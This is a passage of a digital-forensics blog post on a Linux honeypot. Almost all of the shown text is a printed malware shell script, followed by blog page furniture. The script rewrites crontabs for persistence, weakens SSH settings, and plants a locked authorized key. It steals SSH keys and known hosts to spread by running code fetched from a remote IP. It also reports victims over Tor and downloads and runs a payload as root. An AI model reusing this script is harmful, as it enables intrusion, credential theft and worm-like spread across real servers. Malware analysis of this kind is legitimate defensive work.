    ${sudo} ${rm} -rf /var/spool/cron/crontabs/* &gt;/dev/null 2&gt;&amp;1; ${sudo} ${rm} -rf /var/spool/cron/crontabs/.* &gt;/dev/null 2&gt;&amp;1; ${sudo} ${rm} -f /var/spool/cron/* &gt;/dev/null 2&gt;&amp;1; ${sudo} ${rm} -f /var/spool/cron/.* &gt;/dev/null 2&gt;&amp;1; ${sudo} ${rm} -rf /etc/cron.d/* &gt;/dev/null 2&gt;&amp;1; ${sudo} ${rm} -rf /etc/cron.d/.* &gt;/dev/null 2&gt;&amp;1;
    ${sudo} chattr -i -a /etc/cron.hourly &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a -R /etc/cron.hourly/ &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a /etc/cron.daily &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a -R /etc/cron.daily/ &gt;/dev/null 2&gt;&amp;1
    ${sudo} ${rm} -rf /etc/cron.hourly/* &gt;/dev/null 2&gt;&amp;1; ${sudo} ${rm} -rf /etc/cron.hourly/.* &gt;/dev/null 2&gt;&amp;1; ${sudo} ${rm} -rf /etc/cron.daily/* &gt;/dev/null 2&gt;&amp;1; ${sudo} ${rm} -rf /etc/cron.daily/.* &gt;/dev/null 2&gt;&amp;1;
    ${sudo} chattr -a -i /tmp &gt;/dev/null 2&gt;&amp;1; ${sudo} ${rm} -rf /tmp/* &gt;/dev/null 2&gt;&amp;1; ${sudo} ${rm} -rf /tmp/.* &gt;/dev/null 2&gt;&amp;1
    ${sudo} chattr -a -i /etc/crontab &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i /var/spool/cron/root &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i /var/spool/cron/crontabs/root &gt;/dev/null 2&gt;&amp;1
    if &#091; -f /sbin/apk ]; then
        ${sudo} mkdir -p /etc/crontabs &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a /etc/crontabs &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a -R /etc/crontabs/* &gt;/dev/null 2&gt;&amp;1
        ${sudo} ${rm} -rf /etc/crontabs/* &gt;/dev/null 2&gt;&amp;1; ${sudo} echo "${C1}" &gt; /etc/crontabs/root &gt;/dev/null 2&gt;&amp;1 &amp;&amp; ${sudo} echo "${C2}" &gt;&gt; /etc/crontabs/root &gt;/dev/null 2&gt;&amp;1 &amp;&amp; ${sudo} echo '' &gt;&gt; /etc/crontabs/root &gt;/dev/null 2&gt;&amp;1 &amp;&amp; ${sudo} crontab /etc/crontabs/root
    elif &#091; -f /usr/bin/apt-get ]; then
        ${sudo} mkdir -p /var/spool/cron/crontabs &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root &gt;/dev/null 2&gt;&amp;1
        rs=$(${sudo} echo "${C1}" &gt; /var/spool/cron/crontabs/root 2&gt;&amp;1)
        if &#091; -z ${rs} ]; then ${sudo} echo '' &gt;&gt; /var/spool/cron/crontabs/root &amp;&amp; ${sudo} chmod 600 /var/spool/cron/crontabs/root &amp;&amp; ${sudo} crontab /var/spool/cron/crontabs/root; fi
    else
        ${sudo} mkdir -p /var/spool/cron &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a /var/spool/cron/root &gt;/dev/null 2&gt;&amp;1
        rs=$(${sudo} echo "${C1}" &gt; /var/spool/cron/root 2&gt;&amp;1)
        if &#091; -z ${rs} ]; then ${sudo} echo '' &gt;&gt; /var/spool/cron/root &amp;&amp; ${sudo} crontab /var/spool/cron/root; fi
    fi
    ${sudo} chattr -i -a /etc/crontab &gt;/dev/null 2&gt;&amp;1; rs=$(${sudo} echo "${C2}" &gt; /etc/crontab 2&gt;&amp;1)
    if &#091; -z "${rs}" ]; then ${sudo} echo '' &gt;&gt; /etc/crontab &amp;&amp; ${sudo} crontab /etc/crontab; fi
    ${sudo} mkdir -p /etc/cron.d &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a /etc/cron.d/root &gt;/dev/null 2&gt;&amp;1
    rs=$(${sudo} echo "${C2}" &gt; /etc/cron.d/root 2&gt;&amp;1 &amp;&amp; ${sudo} echo '' &gt;&gt; /etc/cron.d/root 2&gt;&amp;1 &amp;&amp; ${sudo} chmod 600 /etc/cron.d/root 2&gt;&amp;1)
    if &#091; $(crontab -l 2&gt;/dev/null|grep -i "${RHOST}"|wc -l) -lt 1 ]; then
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -o ${LPATH}.rm||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -O ${LPATH}.rm) &amp;&amp; chmod +x ${LPATH}.rm
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -o ${LPATH}.cd||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -O ${LPATH}.cd) &amp;&amp; chmod +x ${LPATH}.cd
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -o ${LPATH}.ct||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -O ${LPATH}.ct) &amp;&amp; chmod +x ${LPATH}.ct
        if &#091; -f ${LPATH}.${rm} ] &amp;&amp; &#091; -f ${LPATH}.ct ]; then
            ${sudo} "${crstop}"
            cd=$(which crond)
            ct=$(which crontab)
            if &#091; -n "${ct}" ]; then ${sudo} ${LPATH}.${rm} ${ct}; ${sudo} cp ${LPATH}.ct ${ct}; fi
            ${sudo} "${crstart}"
        fi
    fi

    ${sudo} chattr -i -a ${LPATH} &gt;/dev/null 2&gt;&amp;1;

        &#091; "$(${sudo} cat /etc/ssh/sshd_config | grep '^PermitRootLogin')" != "PermitRootLogin yes" ] &amp;&amp; { ${sudo} echo PermitRootLogin yes &gt;&gt; /etc/ssh/sshd_config; }
    &#091; "$(${sudo} cat /etc/ssh/sshd_config | grep '^RSAAuthentication')" != "RSAAuthentication yes" ] &amp;&amp; { ${sudo} echo RSAAuthentication yes &gt;&gt; /etc/ssh/sshd_config; }
    &#091; "$(${sudo} cat /etc/ssh/sshd_config | grep '^PubkeyAuthentication')" != "PubkeyAuthentication yes" ] &amp;&amp; { ${sudo} echo PubkeyAuthentication yes &gt;&gt; /etc/ssh/sshd_config; }
    &#091; "$(${sudo} cat /etc/ssh/sshd_config | grep '^UsePAM')" != "UsePAM yes" ] &amp;&amp; { ${sudo} echo UsePAM yes &gt;&gt; /etc/ssh/sshd_config; }
    &#091; "$(${sudo} cat /etc/ssh/sshd_config | grep '^PasswordAuthentication yes')" != "PasswordAuthentication yes" ] &amp;&amp; { ${sudo} echo PasswordAuthentication yes &gt;&gt; /etc/ssh/sshd_config; }
    touch "${LPATH}.sysud"
else
    if &#091; $(which crontab|wc -l) -ne 0 ]; then
                cik &gt;/dev/null 2&gt;&amp;1
        crontab -r &gt;/dev/null 2&gt;&amp;1
        (crontab -l &gt;/dev/null 2&gt;&amp;1; echo "${C1}") | crontab -
    fi
fi

localk() {
        KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
        KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
        KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
        HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
        HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "(&#091;0-9]{1,3}\.){3}&#091;0-9]{1,3}")
        HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "(&#091;0-9]{1,3}\.){3}&#091;0-9]{1,3}" | uniq)
        USERZ=$(
                echo "root"
                find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
        )
        userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
        hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
        keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
        for user in $userlist; do
                for host in $hostlist; do
                        for key in $keylist; do
                                chmod +r $key; chmod 400 $key
                                ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl http://34.221.40.237/.x/3sh||wget -q -O- http://34.221.40.237/.x/1sh)|sh" &gt;/dev/null 2&gt;&amp;1 &amp;
                        done
                done
        done
}


sockz &gt;/dev/null 2&gt;&amp;1

${sudo} mkdir -p "${sshdir}" &gt;/dev/null 2&gt;&amp;1
if &#091; ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys &gt;/dev/null 2&gt;&amp;1; fi
${sudo} chattr -i -a "${sshdir}" &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a -R "${sshdir}/" &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a ${sshdir}/authorized_keys &gt;/dev/null 2&gt;&amp;1
if &#091; -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || &#091; $(wc -l &lt; ${sshdir}/authorized_keys) -gt 98 ]; then ${sudo} echo "${skey}" &gt; ${sshdir}/authorized_keys; fi
if &#091; "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}" ]; then
        ${sudo} echo "${skey}" &gt;&gt; ${sshdir}/authorized_keys;
        if &#091; -n "${net}" ]; then
                (${curl} ${COPTS} -x socks5h://$s:9050 "${RHOST}.onion/rsl.php?ip=${net}&amp;login=$(whoami)" || ${curl} ${COPTS} "https://${RHOST}${TOR1}rsl.php?ip=${net}&amp;login=$(whoami)" || ${curl} ${COPTS} "https://${RHOST}${TOR2}rsl.php?ip=${net}&amp;login=$(whoami)" || ${curl} ${COPTS} "https://${RHOST}${TOR3}rsl.php?ip=${net}&amp;login=$(whoami)" || ${wget} ${WOPTS} -O - "https://${RHOST}${TOR1}rsl.php?ip=${net}&amp;login=$(whoami)" || ${wget} ${WOPTS} -O - "https://${RHOST}${TOR2}rsl.php?ip=${net}&amp;login=$(whoami)" || ${wget} ${WOPTS} -O - "https://${RHOST}${TOR3}rsl.php?ip=${net}&amp;login=$(whoami)") &gt;/dev/null 2&gt;&amp;1 &amp;
        fi
fi

${sudo} chmod 0700 ${sshdir} &gt;/dev/null 2&gt;&amp;1; ${sudo} chmod 600 ${sshdir}/authorized_keys &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr +i ${sshdir}/authorized_keys &gt;/dev/null 2&gt;&amp;1

${rm} -rf ./main* &gt;/dev/null 2&gt;&amp;1
${rm} -rf ./*.ico* &gt;/dev/null 2&gt;&amp;1
${rm} -rf ./r64* &gt;/dev/null 2&gt;&amp;1
${rm} -rf ./r32* &gt;/dev/null 2&gt;&amp;1
&#091; $(echo "$0"|grep -i ".cache\|bin"|wc -l) -eq 0 ] &amp;&amp; &#091; "$1" != "" ] &amp;&amp; { ${rm} -f "$0" &gt;/dev/null 2&gt;&amp;1; }
echo -e '\n'
if &#091; -f "${LPATH}.mud" ]; then mudTime=$(find "${LPATH}.mud" -mmin +9); if &#091; ${mudTime-".mud"} != "" ]; then ${rm} -f "${LPATH}.mud" &gt;/dev/null 2&gt;&amp;1; fi; fi

r=${net}_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})

if &#091; $(command -v timeout|wc -l) -ne 0 ]; then
        timeout 300 $(command -v bash) -c "(${curl} ${COPTS} -x socks5h://$s:9050 ${RHOST}.onion/src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR1}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR2}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR3}src/main -e$r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR1}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR2}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR3}src/main --referer $r)|${sudo} $(command -v bash)" &gt;/dev/null 2&gt;&amp;1 &amp;
else
        (${curl} ${COPTS} -x socks5h://$s:9050 ${RHOST}.onion/src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR1}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR2}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR3}src/main -e$r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR1}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR2}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR3}src/main --referer $r)|${sudo} $(command -v bash) &gt;/dev/null 2&gt;&amp;1 &amp;
fi

localk &gt;/dev/null 2&gt;&amp;1</code></pre>
<div id="atatags-370373-6217fc7a28772">
        <script type="text/javascript">
            __ATA.cmd.push(function() {
                __ATA.initVideoSlot('atatags-370373-6217fc7a28772', {
                    sectionId: '370373',
                    format: 'inread'
                });
            });
        </script>
    </div>			<div id="atatags-26942-6217fc7a2881e"></div>
			
			<script>
				__ATA.cmd.push(function() {
					__ATA.initDynamicSlot({
						id: 'atatags-26942-6217fc7a2881e',
						location: 120,
						formFactor: '001',
						label: {
							text: 'Advertisements',
						},
						creative: {
							reportAd: {
								text: 'Report this ad',
							},
							privacySettings: {
								text: 'Privacy',
								onClick: function() { window.__tcfapi && window.__tcfapi( 'showUi' ); },
							}
						}
					});
				});
			</script><div id="jp-post-flair" class="sharedaddy sd-like-enabled sd-sharing-enabled"><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon-text sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-481" class="share-twitter sd-button share-icon" href="https://righteousit.wordpress.com/2021/12/21/hudaks-honeypot-part-2/?share=twitter" target="_blank" title="Click to share on Twitter"><span>Twitter</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-481" class="share-facebook sd-button share-icon" href="https://righteousit.wordpress.com/2021/12/21/hudaks-honeypot-part-2/?share=facebook" target="_blank" title="Click to share on Facebook"><span>Facebook</span></a></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-6525939-481-6217fc7a29282' data-src='//widgets.wp.com/likes/index.html?ver=20220105#blog_id=6525939&amp;post_id=481&amp;origin=righteousit.wordpress.com&amp;obj_id=6525939-481-6217fc7a29282' data-name='like-post-frame-6525939-481-6217fc7a29282' data-title='Like or Reblog'><h3 class='sd-title'>Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Related</em></h3>
</div></div>			</div><!-- .entry-content -->

	<footer class="entry-footer">
		<span class="cat-links">Posted in <a href="https://righteousit.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a></span><span class="tags-links">Tagged <a href="https://righteousit.wordpress.com/tag/dfir/" rel="tag">DFIR</a>, <a href="https://righteousit.wordpress.com/tag/forensics/" rel="tag">Forensics</a>, <a href="https://righteousit.wordpress.com/tag/linux/" rel="tag">Linux</a></span>	</footer><!-- .entry-footer -->

		<div class="entry-author author-avatar-show">
				<div class="author-avatar">
			<img alt='' src='https://1.gravatar.com/avatar/7f07475b144c99087d9684285559d8b8?s=100&#038;d=https%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D100' class='avatar avatar-100' height='100' width='100' />		</div><!-- .author-avatar -->
		
		<div class="author-heading">
			<h2 class="author-title">Published by <span class="author-name">Hal Pomeranz</span></h2>
		</div><!-- .author-heading -->

		<p class="author-bio">
			Independent Computer Forensics and Information Security consultant.  Expert Witness. Trainer.			<a class="author-link" href="https://righteousit.wordpress.com/author/halpomeranz/" rel="author">
				View all posts by Hal Pomeranz			</a>
		</p><!-- .author-bio -->
	</div><!-- .entry-auhtor -->
</article><!-- #post-## -->

			
	<nav class="navigation post-navigation" aria-label="Posts">
		<h2 class="screen-reader-text">Post navigation</h2>
		<div class="nav-links"><div class="nav-previous"><a href="https://righteousit.wordpress.com/2021/12/20/hudaks-honeypot-part-1/" rel="prev"><span class="meta-nav">Previous Post</span> Hudak&#8217;s Honeypot (Part&nbsp;1)</a></div><div class="nav-next"><a href="https://righteousit.wordpress.com/2021/12/27/hudaks-honeypot-part-3/" rel="next"><span class="meta-nav">Next Post</span> Hudak&#8217;s Honeypot (Part&nbsp;3)</a></div></div>
	</nav>
			
<div id="comments" class="comments-area">

	
			<h2 class="comments-title">
			1 thought on &ldquo;Hudak&#8217;s Honeypot (Part&nbsp;2)&rdquo;		</h2><!-- .comments-title -->

		<ol class="comment-list">
					<li id="comment-364" class="pingback even thread-even depth-1 highlander-comment">
			<article id="div-comment-364" class="comment-body">
				<footer class="comment-meta">
					<div class="comment-metadata">
						<span class="comment-author vcard">
							<img alt='' src='https://thisweekin4n6.files.wordpress.com/2017/07/cropped-image-e1499241240995.png?w=54' class='avatar avatar-54' height='54' width='54' />
							<b class="fn"><a href='http://thisweekin4n6.com/2021/12/26/week-52-2021/' rel='external nofollow ugc' class='url'>Week 52 &#8211; 2021 &#8211; This Week In 4n6</a></b>						</span>
						<a href="https://righteousit.wordpress.com/2021/12/21/hudaks-honeypot-part-2/#comment-364">
							<time datetime="2021-12-25T22:49:20-07:00">
								<span class="comment-date">December 25, 2021</span><span class="comment-time screen-reader-text">10:49 pm</span>							</time>
						</a>
												
					</div><!-- .comment-metadata -->

									</footer><!-- .comment-meta -->

				<div class="comment-content">
					<p>[&#8230;] Hudak’s Honeypot (Part 2) [&#8230;]</p>
				</div><!-- .comment-content -->

			</article><!-- .comment-body -->
	</li><!-- #comment-## -->
		</ol><!-- .comment-list -->

		
	
			<p class="no-comments">Comments are closed.</p>
	
	
</div><!-- #comments -->

		
		</main><!-- #main -->
	</div><!-- #primary -->


		</div><!-- #content -->

		<footer id="colophon" class="site-footer" role="contentinfo">
			
			<div class="site-info">
				<a href="https://wordpress.com/?ref=footer_blog" rel="nofollow">Blog at WordPress.com.</a>
				
							</div><!-- .site-info -->
		</footer><!-- #colophon -->
	</div><!-- #page -->
</div><!-- .site-wrapper -->

<!--  -->
<script src='//0.gravatar.com/js/gprofiles.js?ver=202208y' id='grofiles-cards-js'></script>
<script id='wpgroho-js-extra'>
var WPGroHo = {"my_hash":""};
</script>
<script crossorigin='anonymous' type='text/javascript' src='https://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240h'></script>

	<script>
		// Initialize and attach hovercards to all gravatars
		( function() {
			function init() {
				if ( typeof Gravatar === 'undefined' ) {
					return;
				}

				if ( typeof Gravatar.init !== 'function' ) {
					return;
				}

				Gravatar.profile_cb = function ( hash, id ) {
					WPGroHo.syncProfileData( hash, id );
				};

				Gravatar.my_hash = WPGroHo.my_hash;
				Gravatar.init( 'body', '#wp-admin-bar-my-account' );
			}

			if ( document.readyState !== 'loading' ) {
				init();
			} else {
				document.addEventListener( 'DOMContentLoaded', init );
			}
		} )();
	</script>

		<div style="display:none">
	<div class="grofile-hash-map-7f07475b144c99087d9684285559d8b8">
	</div>
	</div>
		<!-- CCPA [start] -->
		<script type="text/javascript">
			( function () {

				var setupPrivacy = function() {

					// Minimal Mozilla Cookie library
					// https://developer.mozilla.org/en-US/docs/Web/API/Document/cookie/Simple_document.cookie_framework
					var cookieLib = window.cookieLib = {getItem:function(e){return e&&decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*"+encodeURIComponent(e).replace(/[\-\.\+\*]/g,"\\$&")+"\\s*\\=\\s*([^;]*).*$)|^.*$"),"$1"))||null},setItem:function(e,o,n,t,r,i){if(!e||/^(?:expires|max\-age|path|domain|secure)$/i.test(e))return!1;var c="";if(n)switch(n.constructor){case Number:c=n===1/0?"; expires=Fri, 31 Dec 9999 23:59:59 GMT":"; max-age="+n;break;case String:c="; expires="+n;break;case Date:c="; expires="+n.toUTCString()}return"rootDomain"!==r&&".rootDomain"!==r||(r=(".rootDomain"===r?".":"")+document.location.hostname.split(".").slice(-2).join(".")),document.cookie=encodeURIComponent(e)+"="+encodeURIComponent(o)+c+(r?"; domain="+r:"")+(t?"; path="+t:"")+(i?"; secure":""),!0}};

					// Implement IAB USP API.
					window.__uspapi = function( command, version, callback ) {

						// Validate callback.
						if ( typeof callback !== 'function' ) {
							return;
						}

						// Validate the given command.
						if ( command !== 'getUSPData' || version !== 1 ) {
							callback( null, false );
							return;
						}

						// Check for GPC. If set, override any stored cookie.
						if ( navigator.globalPrivacyControl ) {
							callback( { version: 1, uspString: '1YYN' }, true );
							return;
						}

						// Check for cookie.
						var consent = cookieLib.getItem( 'usprivacy' );

						// Invalid cookie.
						if ( null === consent ) {
							callback( null, false );
							return;
						}

						// Everything checks out. Fire the provided callback with the consent data.
						callback( { version: 1, uspString: consent }, true );
					};

					// Initialization.
					document.addEventListener( 'DOMContentLoaded', function() {

						// Internal functions.
						var setDefaultOptInCookie = function() {
							var value = '1YNN';
							var domain = '.wordpress.com' === location.hostname.slice( -14 ) ? '.rootDomain' : location.hostname;
							cookieLib.setItem( 'usprivacy', value, 365 * 24 * 60 * 60, '/', domain );
						};

						var setDefaultOptOutCookie = function() {
							var value = '1YYN';
							var domain = '.wordpress.com' === location.hostname.slice( -14 ) ? '.rootDomain' : location.hostname;
							cookieLib.setItem( 'usprivacy', value, 24 * 60 * 60, '/', domain );
						};

						var setDefaultNotApplicableCookie = function() {
							var value = '1---';
							var domain = '.wordpress.com' === location.hostname.slice( -14 ) ? '.rootDomain' : location.hostname;
							cookieLib.setItem( 'usprivacy', value, 24 * 60 * 60, '/', domain );
						};

						var setCcpaAppliesCookie = function( applies ) {
							var domain = '.wordpress.com' === location.hostname.slice( -14 ) ? '.rootDomain' : location.hostname;
							cookieLib.setItem( 'ccpa_applies', applies, 24 * 60 * 60, '/', domain );
						}

						var maybeCallDoNotSellCallback = function() {
							if ( 'function' === typeof window.doNotSellCallback ) {
								return window.doNotSellCallback();
							}

							return false;
						}

						// Look for usprivacy cookie first.
						var usprivacyCookie = cookieLib.getItem( 'usprivacy' );

						// Found a usprivacy cookie.
						if ( null !== usprivacyCookie ) {

							// If the cookie indicates that CCPA does not apply, then bail.
							if ( '1---' === usprivacyCookie ) {
								return;
							}

							// CCPA applies, so call our callback to add Do Not Sell link to the page.
							maybeCallDoNotSellCallback();

							// We're all done, no more processing needed.
							return;
						}

						// We don't have a usprivacy cookie, so check to see if we have a CCPA applies cookie.
						var ccpaCookie = cookieLib.getItem( 'ccpa_applies' );

						// No CCPA applies cookie found, so we'll need to geolocate if this visitor is from California.
						// This needs to happen client side because we do not have region geo data in our $SERVER headers,
						// only country data -- therefore we can't vary cache on the region.
						if ( null === ccpaCookie ) {

							var request = new XMLHttpRequest();
							request.open( 'GET', 'https://public-api.wordpress.com/geo/', true );

							request.onreadystatechange = function () {
								if ( 4 === this.readyState ) {
									if ( 200 === this.status ) {

										// Got a geo response. Parse out the region data.
										var data = JSON.parse( this.response );
										var ccpa_applies = data['region'] && data['region'].toLowerCase() === 'california';

										// Set CCPA applies cookie. This keeps us from having to make a geo request too frequently.
										setCcpaAppliesCookie( ccpa_applies );

										// Check if CCPA applies to set the proper usprivacy cookie.
										if ( ccpa_applies ) {
											if ( maybeCallDoNotSellCallback() ) {
												// Do Not Sell link added, so set default opt-in.
												setDefaultOptInCookie();
											} else {
												// Failed showing Do Not Sell link as required, so default to opt-OUT just to be safe.
												setDefaultOptOutCookie();
											}
										} else {
											// CCPA does not apply.
											setDefaultNotApplicableCookie();
										}
									} else {
										// Could not geo, so let's assume for now that CCPA applies to be safe.
										setCcpaAppliesCookie( true );
										if ( maybeCallDoNotSellCallback() ) {
											// Do Not Sell link added, so set default opt-in.
											setDefaultOptInCookie();
										} else {
											// Failed showing Do Not Sell link as required, so default to opt-OUT just to be safe.
											setDefaultOptOutCookie();
										}
									}
								}
							};

							// Send the geo request.
							request.send();
						} else {
							// We found a CCPA applies cookie.
							if ( ccpaCookie === 'true' ) {
								if ( maybeCallDoNotSellCallback() ) {
									// Do Not Sell link added, so set default opt-in.
									setDefaultOptInCookie();
								} else {
									// Failed showing Do Not Sell link as required, so default to opt-OUT just to be safe.
									setDefaultOptOutCookie();
								}
							} else {
								// CCPA does not apply.
								setDefaultNotApplicableCookie();
							}
						}
					} );
				};

				// Kickoff initialization.
				if ( window.defQueue && defQueue.isLOHP && defQueue.isLOHP === 2020 ) {
					defQueue.items.push( setupPrivacy );
				} else {
					setupPrivacy();
				}

			} )();
		</script>

		<!-- CCPA [end] -->
					<script type="text/javascript">
			( function( $ ) {
				$( document.body ).on( 'post-load', function () {
					if ( typeof __ATA.insertInlineAds === 'function' ) {
						__ATA.insertInlineAds();
					}
				} );
			} )( jQuery );
			</script>	<div id="actionbar" style="display: none;"
			class="actnbr-pub-libre-2 actnbr-has-follow">
		<ul>
								<li class="actnbr-btn actnbr-hidden">
								<a class="actnbr-action actnbr-actn-follow " href="">
			<svg class="gridicon gridicons-reader-follow" height="24" width="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M23 16v2h-3v3h-2v-3h-3v-2h3v-3h2v3h3zM20 2v9h-4v3h-3v4H4c-1.1 0-2-.9-2-2V2h18zM8 13v-1H4v1h4zm3-3H4v1h7v-1zm0-2H4v1h7V8zm7-4H4v2h14V4z"/></g></svg><span>Follow</span>
		</a>
		<a class="actnbr-action actnbr-actn-following  no-display" href="">
			<svg class="gridicon gridicons-reader-following" height="24" width="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M23 13.482L15.508 21 12 17.4l1.412-1.388 2.106 2.188 6.094-6.094L23 13.482zm-7.455 1.862L20 10.89V2H2v14c0 1.1.9 2 2 2h4.538l4.913-4.832 2.095 2.176zM8 13H4v-1h4v1zm3-2H4v-1h7v1zm0-2H4V8h7v1zm7-3H4V4h14v2z"/></g></svg><span>Following</span>
		</a>
							<div class="actnbr-popover tip tip-top-left actnbr-notice" id="follow-bubble">
							<div class="tip-arrow"></div>
							<div class="tip-inner actnbr-follow-bubble">
															<ul>
											<li class="actnbr-sitename">
			<a href="https://righteousit.wordpress.com">
				<img alt='' src='https://s2.wp.com/i/logo/wpcom-gray-white.png' class='avatar avatar-50' height='50' width='50' />				Righteous IT			</a>
		</li>
										<form method="post" action="https://subscribe.wordpress.com" accept-charset="utf-8" style="display: none;">
																						<div class="actnbr-follow-count">Join 34 other followers</div>
																					<div>
										<input type="email" name="email" placeholder="Enter your email address" class="actnbr-email-field" aria-label="Enter your email address" />
										</div>
										<input type="hidden" name="action" value="subscribe" />
										<input type="hidden" name="blog_id" value="6525939" />
										<input type="hidden" name="source" value="https://righteousit.wordpress.com/2021/12/21/hudaks-honeypot-part-2/" />
										<input type="hidden" name="sub-type" value="actionbar-follow" />
										<input type="hidden" id="_wpnonce" name="_wpnonce" value="5d83564ae9" />										<div class="actnbr-button-wrap">
											<button type="submit" value="Sign me up">
												Sign me up											</button>
										</div>
									</form>
									<li class="actnbr-login-nudge">
										<div>
											Already have a WordPress.com account? <a href="https://wordpress.com/log-in?redirect_to=https%3A%2F%2Frighteousit.wordpress.com%2F2021%2F12%2F21%2Fhudaks-honeypot-part-2%2F&#038;signup_flow=account">Log in now.</a>										</div>
									</li>
								</ul>
															</div>
						</div>
					</li>
							<li class="actnbr-ellipsis actnbr-hidden">
				<svg class="gridicon gridicons-ellipsis" height="24" width="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M7 12c0 1.104-.896 2-2 2s-2-.896-2-2 .896-2 2-2 2 .896 2 2zm12-2c-1.104 0-2 .896-2 2s.896 2 2 2 2-.896 2-2-.896-2-2-2zm-7 0c-1.104 0-2 .896-2 2s.896 2 2 2 2-.896 2-2-.896-2-2-2z"/></g></svg>				<div class="actnbr-popover tip tip-top-left actnbr-more">
					<div class="tip-arrow"></div>
					<div class="tip-inner">
						<ul>
									<li class="actnbr-sitename">
			<a href="https://righteousit.wordpress.com">
				<img alt='' src='https://s2.wp.com/i/logo/wpcom-gray-white.png' class='avatar avatar-50' height='50' width='50' />				Righteous IT			</a>
		</li>
								<li class="actnbr-folded-customize">
								<a href="https://righteousit.wordpress.com/wp-admin/customize.php?url=https%3A%2F%2Frighteousit.wordpress.com%2F2021%2F12%2F21%2Fhudaks-honeypot-part-2%2F">
